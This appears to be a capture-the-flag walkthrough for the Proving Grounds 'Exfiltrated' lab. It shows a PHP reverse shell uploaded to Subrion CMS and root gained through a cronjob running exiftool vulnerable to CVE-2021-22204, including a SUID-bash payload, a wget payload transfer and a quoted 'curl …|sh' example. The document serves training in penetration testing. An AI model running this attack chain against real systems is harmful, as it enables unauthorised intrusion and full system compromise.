Exfiltrated
Exploitation Guide for Exfiltrated | Proving Grounds
Last updated
Was this helpful?
Exploitation Guide for Exfiltrated | Proving Grounds
Last updated
Was this helpful?
For initial foothold we will exploit CMS which is vulnerable to authenticated RCE. To escalate our privilege to root, we will exploit cronjob which is running vulnerable application.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/exfiltrated/scans]
└─$ sudo nmap $ip -sVCS -oN nmapInitial.txt -Pn 1 ⨯
[sudo] password for imtodess:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-08 09:06 EDT
Nmap scan report for 192.168.81.163
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.71 seconds
First add the following line in your /etc/hosts to access website.
192.168.81.163 exfiltrated.offsec
# change ip accordinglylogin with credential admin:admin
Once you login, you will be able to find the cms version.
This version of Subrion CMS is vulnerable to authenticated RCE. According to disclosure, we can upload php script with extension phar and pht.
In this walkthrough we will do it manually, but there is also exploit available publicly.
Upload PHP-REVERSE-SHELL script in /panel/uploads:
I used the shell which is readily available in kali linux. Just change the
IPPORTandextension
/usr/share/webshells/php/php-reverse-shell.php
Start a netcat listener and go to /uploads/<shell_name>.phar to execute the malicious script.
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/exfiltrated]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.163] 37140
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
16:14:41 up 1:08, 0 users, load average: 0.03, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@exfiltrated:/$
Check Crontabs
www-data@exfiltrated:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash /opt/image-exif.shOne script is running as root. Check the content if it is allowed to see the purpose of that script.
www-data@exfiltrated:/$ cat /opt/image-exif.sh
cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"It is looking for file with extension jpg in /var/www/html/subrion/uploads and running exiftool on that file.
Check the version of exiftool
www-data@exfiltrated:/$ exiftool -ver
exiftool -ver
11.88Installed version of exiftool is vulnerable to arbitrary code execution. Since its running with a privilege of root. Any code we inject will be executed with root privilege.
Information about vulnerability:
Download the exploit from: https://github.com/bilkoh/POC-CVE-2021-22204
Download the exploit to your machine.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/exfiltrated/exploit]
└─$ git clone https://github.com/bilkoh/POC-CVE-2021-22204.git
Cloning into 'POC-CVE-2021-22204'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 1), reused 7 (delta 1), pack-reused 0
Receiving objects: 100% (7/7), done.
Resolving deltas: 100% (1/1), done. Create malicious file.
┌──(imtodess㉿deathnote)-[~/…/pg/exfiltrated/exploit/POC-CVE-2021-22204]
└─$ ./build_image.pl "chmod +s /bin/bash"
POC-CVE-2021-22204
Usage ./build_image.pl <cmd to inject>
Note: if your cmd contains unix special characters use quote!
EG: ./build_image.pl "curl xxxx.com/script.sh|sh"
This poc generates an image file (notevil.jpg) to be proccessed by vulnerable exiftool.
And requires DjVuLibre to be installed and in PATH
See: http://djvu.sourceforge.net/
---
[+] Preparing annotation file.
[+] Creating image file with: djvumake notevil.jpg INFO=0,0 BGjp=/dev/null ANTa=ant.out
[+] notevil.jpg created.note : I am simply trying to set SUID permission on
/bin/bashfor Privilege Escalation. You can try to get reverse shell instead.
Now we need to transfer the exploit to target machine.
Host the exploit in http.server
┌──(imtodess㉿deathnote)-[~/…/pg/exfiltrated/exploit/POC-CVE-2021-22204]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...Download in target machine using wget
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget http://192.168.49.81:8080/notevil.jpg
Connecting to 192.168.49.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122 [image/jpeg]
Saving to: ‘notevil.jpg’
notevil.jpg 100%[===================>] 122 --.-KB/s in 0s
2021-09-08 14:54:21 (18.0 MB/s) - ‘notevil.jpg’ saved [122/122] I downloaded directly on
uploadsdirectory. If you downloaded somewhere else make sure to move it to/var/www/html/subrion/uploads
Now just wait for cronjob to execute.
www-data@exfiltrated:/var/www/html/subrion/uploads$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18 2020 /bin/bashPermission has successfully change. Just run bash -p to get root shell.
www-data@exfiltrated:/var/www/html/subrion/uploads$ bash -p
bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# whoami
whoami
root Get those flags
bash-5.0# cat proof.txt
cat proof.txt
172b13<Redacted>74d4bf3
bash-5.0# find / -type f -name local.txt 2>/dev/null
find / -type f -name local.txt 2>/dev/null
/home/coaran/local.txt
bash-5.0# cat /home/coaran/local.txt
cat /home/coaran/local.txt
8b874f3<REDACTED>a5768472
